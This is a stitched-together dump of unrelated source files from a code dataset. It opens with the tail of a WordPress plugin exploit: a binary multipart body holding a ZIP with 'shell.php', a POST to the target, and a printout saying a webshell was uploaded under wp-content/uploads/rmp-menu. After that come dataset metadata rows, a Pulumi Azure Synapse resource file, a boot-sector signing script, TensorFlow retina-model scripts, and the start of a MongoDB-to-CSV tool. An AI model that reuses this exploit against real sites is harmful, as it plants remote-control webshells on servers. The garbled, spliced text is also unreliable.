\x82\xac.\x80\xe0u\xee%\xe9\x06Y\x84}\xdd\xc0\x14\x8e\xef\x89\xc9\xe3\x1a\"\xdc\x9a=!F-0~\xbd\x8c\xcf`\xe5\xf9\xf8\xe1B\xafXX\x8a&\xae\xb6FZ\x97\x92.q\xc9\x0f4c\xa2\n\x9f\xcb%\xd1~\xab\xc8\x8e\xe2i\x00Yd\n\xaa\xaeI@G\x9a\xac\x99Z\xb6\xeb\xe9\x93\x83:\xa3\xb1\x01\tu2\xdc\x12\n\xb5\x96$V\xb4\xff\xf3_\xa6\x06\xab\xaf\x84\xe5Z\xfa-xh\xef\xdf\x00\x8c\xb6\t\xe4\x9eb7Q\xcee\x85\xc3j\xf2\xe5\x12^!d\xd7Kz\x03\rI\xa1N\x81\xec@\xeb3\xc2)\xdb\xd0$J\x83O\xb4\xcdl\xb8\x8aP\x156\x14\xda\xaf\xd23/\xf7*\xed\x86\xcf\x90\xe3\x17nR9[\xd8\x06q\x03\xe5\xa8+!x\xdb\n\x16\x02)F\xae\x8d\xf3\x9cm9(\"\xff\x8f\x9b&\x9d\xb9Jd\x04\xdb\xf0\x9ah\xc5\x01\x94\x0c\xadvzO\xcdI\x8bhO\xadYx\xa4\xa9\x8b)+\xd8c\x0e\xeb%\xebA\xfb\x1ct\x82\xa0\x1bV9\xf3:\xaaJ\xab\xd8\xfe\x8b\x03\xc9\xb9\x15\x84t\x91X\xbdzx\xeb\xe8\xb9\xfa\xb7j\x9a\xcaxre\xb5|\x95|C\xd6\x03?\xdd\x16\xfe\x81>\xe0\x86@\xa7\x98\x1e)+\xb5\xe2~#\x030n\xe9C\x95o\xf1[{\xe7x T\xb8\xb6\x97\xe3A\xae\xddn\xb9w\xe6k\xfcU \x0eR\xb6\x1d^QP\xd0\x14\xf19}\n\x17\x03\xcb\xe2\xbe\x845h\xf11\xac\x11\x18\x03I\xf1l\xa7\x8fE\xab\xfaL\xac0\xa4\xdd\xde\xaaX2\xf2\xe6\x95\x8bt\xc5\x90\xac\xbe\x92;\xac\xba.\xf0QS\x19\xc2GT\xfe\xe5u\xbf\x16^\xc1\xc7\x18fH\xbc\x8e\xf7\xaa|\x91\xf5}\xa65q:lk\xcf\xa2\xda\xc4\xda\xb7N\xfc\x1a\x86\xea%)0\xf0\xecY\xcd\xa4Q\xf0\x8bu\x98Ob\xf8\x13\xa6\xd0F\x05\xc3\xcfw\xdf\x8d\xdc\xe6K\xbb\xfc\xa7\xbbZ\xe3\xca\x1a5\xaa\x9d\x8c\x07\xdb0b\xdfgtlA\xaa\\'\\\xae\x9c\xbeu8\xdb\xacd_\x8c\xbex\xff\\y!&\xe7W\xe1<\x9e2\xd02\xd9\xf2\x89\xb7\xd2'7[\xd2\xe4\x14i\x1ey-\xd8\x19G\xd6,\x86\xfdp\xcd.I\xde`\xfdqN\xa3\x87K\x96\x81\xd4V\x02,\xc5\xf9}\x86\x0f\xf6#:\x02\xc12\x89\xe7d\x9c\x87u\xe5{\x0eU<{\xc2\x95v\xddt\xb4\xb8z\xf9=\xf0\x8f\x1f\xde\x9eB\x1e\x00\xfb\"p\x02\xb6NCZ\xdc\xc3<Y\xd1\xcfi^\x03\xd8M\xddf\xbe\xa2D^\x93\xce\x02O\xbcL\xf0T\x95\xc5\x94G\xa2\xb6\xee\xa7\xe9\x16\xf3\xcf?^\xbcI\x9205\xa4\x02\x03\xc0\x1a\xec\x0fc4\xbcN\x0f\xf9/3v\x12)W~\x04\x8ei\"\xd0\xbdQ\\\xb3\x07\x04\x9a\\\x8b\xbco/\x16\x8b6\xd8q\xd6\x06\xc4\\q\x8eJ\x12\xc6\x87\x8f\xfb\xca\x878\x814\x90\xd7\x93\n{^\xa5\x9e\xd0\xe48\x9a\x8d\xbd\xc4\xb1,\x1eC\x9e>\xe5\x0cC\xd3<\xe6'?\x9d\xda<!\x89T\xb7\xdf\x8b\xdaM\xb3\xfd\x1fb6\xc7~\xb8|\xf7\x93\x11\xe2\x1d\xc1\x05\xef\xbd\xa2\xf7\xaa\x02\x9a\xfc\xa43I\x971\xd69\x0f\x8c\xe0\xa9#n\xd4\xd7\xfa\xb2\x07n\xafk\xe7lS\xbf\x98\xe2\x9f\x88!\x97xp\x97\xd2\xeb\x12\xe6\xcd\x0c\xdb\xe7\xfb\xac\xa2\xbc\xc0\xfd\xc5w\xf4b<\xa8\xcf\xab\xb3\xa4>\xf0Y)H\xf6\x82\xca\xbc\x9au\xe0\x01\r\xfb^.\xc9\xc2\xf5\x9d`a\xb0\xf7\x8a\x8a\x01\xf5\xf8]N\x18&\xa0\x81\xd1\xcb\xb4U5]\xd8i\x8e\x15\x01XJ\xca\x10\xaf@\x91\xbf\xc7\x91-v\"\x8a\x03\x16v\xbc\xc8\x06\xc0\xb8\t?\xcc\xc1C\x9c\xcb\xf3\x8b\xf3\xd3+\xad\xca\xa8\xd5[[%\x85\xaf2\xc9\x8c$\xc8t^\x81{\xd3\x85\xbf\xb0\xaa\x15\x84\x13\xfaS\x96\xaa*6_\xd2\xb5\xab5\xdb8v\xc4U\xb5\x87[]\xcbZ\x87\x85\x03\xaa0\xad\xca\x17\xd5dj\x15$9\xff\xb1)\xdfi;6\xf9\x1f\x05\xf1\x17\xac[J\x88\x83\xd7\xf7\\\xa7'\xfe\x92-\t\xee\x18\xb2\x95Ug\xc6|\xbf\xc4^\x1e\x0b\xbb-,A\r\x87\xc3\xe2\x00\"\xf5\x89N\tf\xb8z\x19\xf2\x0eV6\xea\x8b\x82\xd0\x0e\x02@\xab\t\xdf\x83l\xf8\x907\x0e\xf9 \x13_\x06\xd8\xba$K\x06\xc3\xc2\x0b1\x07&\xcc\x94%\xfb\x9dG\xbc$\r\x18\xc5\xc0`\xf0\x00 \x01\x91)5.\xf1u\xf87\x86\x9e\x03s.\xa0K\x1f6\x011P2\x0c \xb6,\"^\x0e\x9b\x8c:\xfc? ?\x13\xf8\xcf\x14(y#\xc3\xb0d\xf2\x0cD;\xd009\xc7\x84\x10\x15b\x03\xa1`\x18|\xc2\x979\xc01L\xe8%4\xb6\x90\x1a~\x0f\x97\x08\x91\xb5\xc3\xebr\x08\x1c\x13\x86z\x89\x03\x8a\xaa\xc0\xa6\x8ag\x99R\xe3\xdf\xeb\x9e\x82\xf1\x8a\xbd&8O\xc1\xefLp\xbcBS\xde\xc3\xd8\xb9\x95\xca\x11\xf9\x05fX\xec{\xd2\xbc\x95\x06\x8aj\x8c\xb8\xa3\x98o\xec\x9f\x9c\x9c\x1c\x9b\x0c\x83\xda\xc5\xcb\xad\xacG\xdcJur$\xf9\x1f\xcb\xb1\x9f\x81\x0f9\x19\x1ef\xf6\xb4\xca*\x8dfn\xa8\x99\\\x93\xf4zl\xf2\x89\xbd\x03\xb3\x9d\xfd9\xe0\x00PK\x07\x08\xad;\xa6\xce\xde\x0f\x00\x00TB\x00\x00PK\x01\x02\x14\x03\x14\x00\x08\x00\x08\x00\xef\xbb\xb9R\xad;\xa6\xce\xde\x0f\x00\x00TB\x00\x00\t\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\xb4\x81\x00\x00\x00\x00shell.phpUT\r\x00\x07\xb3l\xad`-\xe2\xe2`\xb3l\xad`ux\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00PK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00W\x00\x00\x005\x10\x00\x00\x00\x00\r\n-----------------------------12473561203192832341566500492--\r\n"
session.post(exploit_url, headers=header, data=body)
print('[+] Exploit done !')
print(' -> Webshell uploaded to: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/rmp-menu/themes/shell.php')
print('')
| 133.968
| 12,564
| 0.706736
|
cd08e79491fedb650897d395314a27aacf3f1bcf
| 12,002
|
py
|
Python
|
sdk/python/pulumi_azure_native/synapse/v20210501/private_endpoint_connection.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/synapse/v20210501/private_endpoint_connection.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/synapse/v20210501/private_endpoint_connection.py
|
polivbr/pulumi-azure-native
|
09571f3bf6bdc4f3621aabefd1ba6c0d4ecfb0e7
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._inputs import *
__all__ = ['PrivateEndpointConnectionInitArgs', 'PrivateEndpointConnection']
@pulumi.input_type
class PrivateEndpointConnectionInitArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
workspace_name: pulumi.Input[str],
private_endpoint_connection_name: Optional[pulumi.Input[str]] = None,
private_link_service_connection_state: Optional[pulumi.Input['PrivateLinkServiceConnectionStateArgs']] = None):
"""
The set of arguments for constructing a PrivateEndpointConnection resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[str] workspace_name: The name of the workspace.
:param pulumi.Input[str] private_endpoint_connection_name: The name of the private endpoint connection.
:param pulumi.Input['PrivateLinkServiceConnectionStateArgs'] private_link_service_connection_state: Connection state of the private endpoint connection.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "workspace_name", workspace_name)
if private_endpoint_connection_name is not None:
pulumi.set(__self__, "private_endpoint_connection_name", private_endpoint_connection_name)
if private_link_service_connection_state is not None:
pulumi.set(__self__, "private_link_service_connection_state", private_link_service_connection_state)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group. The name is case insensitive.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="workspaceName")
def workspace_name(self) -> pulumi.Input[str]:
"""
The name of the workspace.
"""
return pulumi.get(self, "workspace_name")
@workspace_name.setter
def workspace_name(self, value: pulumi.Input[str]):
pulumi.set(self, "workspace_name", value)
@property
@pulumi.getter(name="privateEndpointConnectionName")
def private_endpoint_connection_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the private endpoint connection.
"""
return pulumi.get(self, "private_endpoint_connection_name")
@private_endpoint_connection_name.setter
def private_endpoint_connection_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "private_endpoint_connection_name", value)
@property
@pulumi.getter(name="privateLinkServiceConnectionState")
def private_link_service_connection_state(self) -> Optional[pulumi.Input['PrivateLinkServiceConnectionStateArgs']]:
"""
Connection state of the private endpoint connection.
"""
return pulumi.get(self, "private_link_service_connection_state")
@private_link_service_connection_state.setter
def private_link_service_connection_state(self, value: Optional[pulumi.Input['PrivateLinkServiceConnectionStateArgs']]):
pulumi.set(self, "private_link_service_connection_state", value)
class PrivateEndpointConnection(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
private_endpoint_connection_name: Optional[pulumi.Input[str]] = None,
private_link_service_connection_state: Optional[pulumi.Input[pulumi.InputType['PrivateLinkServiceConnectionStateArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
workspace_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
A private endpoint connection
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] private_endpoint_connection_name: The name of the private endpoint connection.
:param pulumi.Input[pulumi.InputType['PrivateLinkServiceConnectionStateArgs']] private_link_service_connection_state: Connection state of the private endpoint connection.
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[str] workspace_name: The name of the workspace.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: PrivateEndpointConnectionInitArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A private endpoint connection
:param str resource_name: The name of the resource.
:param PrivateEndpointConnectionInitArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PrivateEndpointConnectionInitArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
private_endpoint_connection_name: Optional[pulumi.Input[str]] = None,
private_link_service_connection_state: Optional[pulumi.Input[pulumi.InputType['PrivateLinkServiceConnectionStateArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
workspace_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PrivateEndpointConnectionInitArgs.__new__(PrivateEndpointConnectionInitArgs)
__props__.__dict__["private_endpoint_connection_name"] = private_endpoint_connection_name
__props__.__dict__["private_link_service_connection_state"] = private_link_service_connection_state
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if workspace_name is None and not opts.urn:
raise TypeError("Missing required property 'workspace_name'")
__props__.__dict__["workspace_name"] = workspace_name
__props__.__dict__["name"] = None
__props__.__dict__["private_endpoint"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:synapse/v20210501:PrivateEndpointConnection"), pulumi.Alias(type_="azure-native:synapse:PrivateEndpointConnection"), pulumi.Alias(type_="azure-nextgen:synapse:PrivateEndpointConnection"), pulumi.Alias(type_="azure-native:synapse/v20190601preview:PrivateEndpointConnection"), pulumi.Alias(type_="azure-nextgen:synapse/v20190601preview:PrivateEndpointConnection"), pulumi.Alias(type_="azure-native:synapse/v20201201:PrivateEndpointConnection"), pulumi.Alias(type_="azure-nextgen:synapse/v20201201:PrivateEndpointConnection"), pulumi.Alias(type_="azure-native:synapse/v20210301:PrivateEndpointConnection"), pulumi.Alias(type_="azure-nextgen:synapse/v20210301:PrivateEndpointConnection"), pulumi.Alias(type_="azure-native:synapse/v20210401preview:PrivateEndpointConnection"), pulumi.Alias(type_="azure-nextgen:synapse/v20210401preview:PrivateEndpointConnection"), pulumi.Alias(type_="azure-native:synapse/v20210601:PrivateEndpointConnection"), pulumi.Alias(type_="azure-nextgen:synapse/v20210601:PrivateEndpointConnection"), pulumi.Alias(type_="azure-native:synapse/v20210601preview:PrivateEndpointConnection"), pulumi.Alias(type_="azure-nextgen:synapse/v20210601preview:PrivateEndpointConnection")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(PrivateEndpointConnection, __self__).__init__(
'azure-native:synapse/v20210501:PrivateEndpointConnection',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'PrivateEndpointConnection':
"""
Get an existing PrivateEndpointConnection resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = PrivateEndpointConnectionInitArgs.__new__(PrivateEndpointConnectionInitArgs)
__props__.__dict__["name"] = None
__props__.__dict__["private_endpoint"] = None
__props__.__dict__["private_link_service_connection_state"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["type"] = None
return PrivateEndpointConnection(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="privateEndpoint")
def private_endpoint(self) -> pulumi.Output[Optional['outputs.PrivateEndpointResponse']]:
"""
The private endpoint which the connection belongs to.
"""
return pulumi.get(self, "private_endpoint")
@property
@pulumi.getter(name="privateLinkServiceConnectionState")
def private_link_service_connection_state(self) -> pulumi.Output[Optional['outputs.PrivateLinkServiceConnectionStateResponse']]:
"""
Connection state of the private endpoint connection.
"""
return pulumi.get(self, "private_link_service_connection_state")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
Provisioning state of the private endpoint connection.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or "Microsoft.Storage/storageAccounts"
"""
return pulumi.get(self, "type")
| 52.640351
| 1,283
| 0.707549
|
af19bcae59618400bbb5873efaf8ea86b76a5ac8
| 628
|
py
|
Python
|
src/boot/sign.py
|
Sinap/PotatOS
|
479e16ebaa826e709960e48dd2fb5812b90c7bc1
|
[
"MIT"
] | null | null | null |
src/boot/sign.py
|
Sinap/PotatOS
|
479e16ebaa826e709960e48dd2fb5812b90c7bc1
|
[
"MIT"
] | null | null | null |
src/boot/sign.py
|
Sinap/PotatOS
|
479e16ebaa826e709960e48dd2fb5812b90c7bc1
|
[
"MIT"
] | null | null | null |
#!/usr/env python
from __future__ import print_function
import os
import sys
def main():
boot = sys.argv[1]
if not os.path.exists(boot):
print('File %s does not exist' % boot, file=sys.stderr)
exit(1)
with open(boot, 'rb') as f:
buff = f.read()
buff_len = len(buff)
if buff_len > 510:
print('Boot block to large: %d bytes (max 510)' % buff_len,
file=sys.stderr)
exit(1)
buff += "\0" * (510 - buff_len)
buff += "\x55\xAA"
with open(boot, 'wb') as f:
f.write(buff)
if __name__ == '__main__':
main()
| 22.428571
| 71
| 0.533439
|
f07f43f67fb324e85689c9998c32b0dbc5983882
| 843
|
py
|
Python
|
config/deep_bidir_lstm_2x128.py
|
dheeraj091/sememtic
|
8aa526c12dd96e900414f90f1d78d034ffdf531e
|
[
"MIT"
] | 459
|
2016-02-29T22:23:05.000Z
|
2022-03-21T20:14:08.000Z
|
config/deep_bidir_lstm_2x128.py
|
yifan/DeepMind-Teaching-Machines-to-Read-and-Comprehend
|
8ad50e9f2562b1fd055939e8582f07e46f54b1ef
|
[
"MIT"
] | 11
|
2016-03-11T14:15:01.000Z
|
2018-12-05T15:17:23.000Z
|
config/deep_bidir_lstm_2x128.py
|
yifan/DeepMind-Teaching-Machines-to-Read-and-Comprehend
|
8ad50e9f2562b1fd055939e8582f07e46f54b1ef
|
[
"MIT"
] | 130
|
2016-03-02T15:51:32.000Z
|
2022-03-21T20:13:59.000Z
|
from blocks.algorithms import BasicMomentum, AdaDelta, RMSProp, Adam, CompositeRule, StepClipping
from blocks.initialization import IsotropicGaussian, Constant
from blocks.bricks import Tanh
from model.deep_bidir_lstm import Model
batch_size = 32
sort_batch_count = 20
shuffle_questions = True
shuffle_entities = True
concat_ctx_and_question = True
concat_question_before = True ## should not matter for bidirectionnal network
embed_size = 200
lstm_size = [128, 128]
skip_connections = True
n_entities = 550
out_mlp_hidden = []
out_mlp_activations = []
step_rule = CompositeRule([RMSProp(decay_rate=0.95, learning_rate=5e-5),
BasicMomentum(momentum=0.9)])
dropout = 0.1
w_noise = 0.05
valid_freq = 1000
save_freq = 1000
print_freq = 100
weights_init = IsotropicGaussian(0.01)
biases_init = Constant(0.)
| 22.184211
| 97
| 0.768683
|
bb7127404cfd6a0ee628556a0730e10a5ce8ab97
| 10,716
|
py
|
Python
|
assignment3/test_retina.py
|
dbirman/cs375
|
7aeac1ed57eff74cbecb3e1091b01f00d34629a8
|
[
"MIT"
] | null | null | null |
assignment3/test_retina.py
|
dbirman/cs375
|
7aeac1ed57eff74cbecb3e1091b01f00d34629a8
|
[
"MIT"
] | null | null | null |
assignment3/test_retina.py
|
dbirman/cs375
|
7aeac1ed57eff74cbecb3e1091b01f00d34629a8
|
[
"MIT"
] | 2
|
2017-12-02T01:46:28.000Z
|
2018-01-08T21:36:58.000Z
|
from __future__ import division, print_function, absolute_import
import os, sys
from collections import OrderedDict
import numpy as np
import pymongo as pm
import tensorflow as tf
from tfutils import base, data, model, optimizer, utils
import copy
NUM_GPUS = 1
if not isinstance(NUM_GPUS, list):
DEVICES = ['/gpu:' + str(i) for i in range(NUM_GPUS)]
else:
DEVICES = ['/gpu:' + str(i) for i in range(len(NUM_GPUS))]
MODEL_PREFIX = 'model_0'
MB_SIZE = 2000
# Data parameters
INPUT_BATCH_SIZE = 1024 # queue size
IMAGE_SIZE_RESIZE = 50
WN_DATA_PATH = '/datasets/deepretina_data/tf_records/whitenoise'
NS_DATA_PATH = '/datasets/deepretina_data/tf_records/naturalscene'
# data provider
class retinaTF(data.TFRecordsParallelByFileProvider):
def __init__(self,
source_dirs,
resize=IMAGE_SIZE_RESIZE,
**kwargs
):
if resize is None:
self.resize = 50
else:
self.resize = resize
postprocess = {'images': [], 'labels': []}
postprocess['images'].insert(0, (tf.decode_raw, (tf.float32, ), {}))
postprocess['images'].insert(1, (tf.reshape, ([-1] + [50, 50, 40], ), {}))
postprocess['images'].insert(2, (self.postproc_imgs, (), {}))
postprocess['labels'].insert(0, (tf.decode_raw, (tf.float32, ), {}))
postprocess['labels'].insert(1, (tf.reshape, ([-1] + [5], ), {}))
super(retinaTF, self).__init__(
source_dirs,
postprocess=postprocess,
**kwargs
)
def postproc_imgs(self, ims):
def _postprocess_images(im):
im = tf.image.resize_images(im, [self.resize, self.resize])
return im
return tf.map_fn(lambda im: _postprocess_images(im), ims, dtype=tf.float32)
def ln(inputs, train=True, prefix=MODEL_PREFIX, devices=DEVICES, num_gpus=NUM_GPUS, seed=0, cfg_final=None):
params = OrderedDict()
batch_size = inputs['images'].get_shape().as_list()[0]
params['train'] = train
params['batch_size'] = batch_size
# implement your LN model here
flat = tf.contrib.layers.flatten(inputs['images'])
num_units = 5
out = tf.layers.dense(
flat,
num_units,
activation=tf.nn.softplus,
kernel_regularizer=tf.contrib.layers.l2_regularizer(1E-3))
return out, params
def dense_(inputs, shape, activation=tf.nn.softplus):
"""
Args:
shape: [input, output]
"""
weights = tf.get_variable(shape=shape, dtype=tf.float32,
initializer=tf.random_normal_initializer(stddev=0.05),
regularizer=tf.contrib.layers.l2_regularizer(1e-3),
name='weights')
biases = tf.get_variable('biases', [shape[1]], tf.float32, tf.zeros_initializer())
FC = tf.nn.xw_plus_b(inputs, weights, biases, name='FC')
if activation is not None:
out = activation(FC)
else:
out = FC
return out
def conv_(inp, conv_shape, stride, padding='SAME', reg=None):
if reg is not None:
weights = tf.get_variable(shape=conv_shape, dtype=tf.float32,
initializer=tf.contrib.layers.xavier_initializer(),
regularizer=tf.contrib.layers.l2_regularizer(reg),
name='weights')
else:
weights = tf.get_variable(shape=conv_shape, dtype=tf.float32,
initializer=tf.contrib.layers.xavier_initializer(), name='weights')
conv = tf.nn.conv2d(inp, weights,[1, stride, stride, 1], padding=padding, name='conv')
biases = tf.get_variable(initializer=tf.zeros_initializer(), shape=[conv_shape[3]], dtype=tf.float32, name='bias')
out = tf.nn.bias_add(conv, biases)
return out, weights
def gaussian_noise_(input_layer, std):
noise = tf.random_normal(shape=tf.shape(input_layer), mean=0.0, stddev=std, dtype=tf.float32)
return input_layer + noise
def relu_(inp):
return tf.nn.relu(inp)
def cnn(inputs, train=True, prefix=MODEL_PREFIX, devices=DEVICES, num_gpus=NUM_GPUS, seed=0, cfg_final=None):
params = OrderedDict()
batch_size = inputs['images'].get_shape().as_list()[0]
params['train'] = train
params['batch_size'] = batch_size
with tf.variable_scope('conv1'):
temp, c1_k = conv_(inputs['images'],[15,15,40,16],1,padding='VALID')
if train:
conv1 = relu_(gaussian_noise_(temp,std=0.1))
else:
conv1 = relu_(temp)
with tf.variable_scope('conv2'):
temp, c2_k = conv_(conv1,[9,9,16,8],1,padding='VALID',reg=1e-3)
if train:
conv2 = relu_(gaussian_noise_(temp,std=0.1))
else:
conv2 = relu_(temp)
with tf.variable_scope('fc'):
flat_len = np.product(conv2.shape.as_list()[1:])
flatten = tf.reshape(conv2, [-1, flat_len])
out = dense_(flatten,[flat_len,5])
return out, params
def pearson_agg(results):
# concatenate results along batch dimension
true_rates = np.concatenate(results['labels'], axis=0)
pred_rates = np.concatenate(results['pred'], axis=0)
true_std = np.std(true_rates, axis=0)
pred_std = np.std(pred_rates, axis=0)
true_mean = np.mean(true_rates, axis=0)
pred_mean = np.mean(pred_rates, axis=0)
r = np.mean( (true_rates - true_mean) * (pred_rates - pred_mean), axis=0 ) / (true_std * pred_std)
return {'pearson' : r}
def online_agg(agg_res, res, step):
if agg_res is None:
agg_res = {k: [] for k in res}
for k, v in res.items():
agg_res[k].append(v)
return agg_res
def return_outputs(inputs, outputs, targets, **kwargs):
"""
Illustrates how to extract desired targets from the model
"""
retval = {}
retval['labels'] = inputs['labels']
retval['pred'] = outputs
return retval
# model parameters
default_params = {
'save_params': {
'host': '35.199.154.71',
'port': 24444,
'dbname': 'deepretina',
'exp_id': 'trainval0',
},
'load_params': {
'host': '35.199.154.71',
'port': 24444,
'do_restore': True,
'query': None
},
'model_params': {
'func': ln,
'num_gpus': NUM_GPUS,
'devices': DEVICES,
'prefix': MODEL_PREFIX
},
'validation_params': {
'whitenoise_pearson': {
'data_params': {
'func': retinaTF,
'source_dirs': [os.path.join(WN_DATA_PATH, 'images'), os.path.join(WN_DATA_PATH, 'labels')],
'resize': IMAGE_SIZE_RESIZE,
'batch_size': INPUT_BATCH_SIZE,
'file_pattern': 'test*.tfrecords',
'n_threads': 4
},
'targets': {
'func': return_outputs,
'targets': ['labels'],
},
'queue_params': {
'queue_type': 'fifo',
'batch_size': MB_SIZE,
'capacity': 11*INPUT_BATCH_SIZE,
'min_after_dequeue': 10*INPUT_BATCH_SIZE,
'seed': 0,
},
'num_steps': 5957 // MB_SIZE + 1,
'agg_func': pearson_agg,
'online_agg_func': online_agg
},
'naturalscene_pearson': {
'data_params': {
'func': retinaTF,
'source_dirs': [os.path.join(NS_DATA_PATH, 'images'), os.path.join(NS_DATA_PATH, 'labels')],
'resize': IMAGE_SIZE_RESIZE,
'batch_size': INPUT_BATCH_SIZE,
'file_pattern': 'test*.tfrecords',
'n_threads': 4
},
'targets': {
'func': return_outputs,
'targets': ['labels'],
},
'queue_params': {
'queue_type': 'fifo',
'batch_size': MB_SIZE,
'capacity': 11*INPUT_BATCH_SIZE,
'min_after_dequeue': 10*INPUT_BATCH_SIZE,
'seed': 0,
},
'num_steps': 5956 // MB_SIZE + 1,
'agg_func': pearson_agg,
'online_agg_func': online_agg
}
},
'log_device_placement': False, # if variable placement has to be logged
}
def test_ln(steps=None, train_stimulus='whitenoise'):
params = copy.deepcopy(default_params)
for param in ['save_params', 'load_params']:
params[param]['dbname'] = 'ln_model'
params[param]['collname'] = train_stimulus
params[param]['exp_id'] = 'trainval0'
params['model_params']['func'] = ln
# determine time steps
if steps is None:
conn = pm.MongoClient(port=params['load_params']['port'])
coll = conn[params['load_params']['dbname']][train_stimulus + '.files']
steps = [i['step'] for i in coll.find({'exp_id': 'trainval0',
'train_results': {'$exists': True}}, projection=['step'])]
for step in steps:
print("Running Step %s" % step)
params['load_params']['query'] = {'step': step}
params['save_params']['exp_id'] = 'testval_step%s' % step
base.test_from_params(**params)
def test_cnn(steps=None, train_stimulus='whitenoise'):
params = copy.deepcopy(default_params)
params['model_params']['func'] = cnn
for param in ['save_params', 'load_params']:
params[param]['dbname'] = 'cnn'
params[param]['collname'] = train_stimulus
params[param]['exp_id'] = 'trainval0'
if steps is None:
conn = pm.MongoClient(port=params['load_params']['port'])
coll = conn[params['load_params']['dbname']][train_stimulus + '.files']
steps = [i['step'] for i in coll.find({'exp_id': 'trainval0',
'train_results': {'$exists': True}}, projection=['step'])]
print(params['load_params'])
for step in steps:
# determine time steps
#print("Running Step %s" % step)
params['load_params']['query'] = {'step': step}
params['save_params']['exp_id'] = 'testval_step%s' % step
#base.test_from_params(**params)
if __name__ == '__main__':
# Set stim_type (at the top of this file) to change the data input to the models.
# Set the stimulus paSram below to load the model trained on [stimulus].
# i.e. stim_type = whitenoise, stimulus = naturalscene means calculating the correlation coefficient
# for whitenoise data on the model trained on naturalscene data.
# Set the step below to change the model checkpoint.
for stimulus in ['whitenoise','naturalscene']:
test_cnn(train_stimulus=stimulus)
#test_ln(train_stimulus=stimulus)
| 35.483444
| 118
| 0.587346
|
d1eaa762ec6081cf1c844c36c7ccbf0b4a46b22c
| 3,125
|
py
|
Python
|
cmongo2csv.py
|
stpettersens/cmongo2csv
|
0b15a3f375a3e84322e96ac070d469ed6ffdd827
|
[
"MIT"
] | null | null | null |
cmongo2csv.py
|
stpettersens/cmongo2csv
|
0b15a3f375a3e84322e96ac070d469ed6ffdd827
|
[
"MIT"
] | null | null | null |
cmongo2csv.py
|
stpettersens/cmongo2csv
|
0b15a3f375a3e84322e96ac070d469ed6ffdd827
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""
cmongo2csv
Utility to convert a MongoDB JSON dump to a CSV file.
Copyright 2015 Sam Saint-Pettersen.
Licensed under the MIT/X11 License.
Use -h switch for usage information.
"""
import sys
import re
import json
import argparse
signature = 'cmongo2csv 1.0.1 (https://github.com/stpettersens/cmongo2csv)'
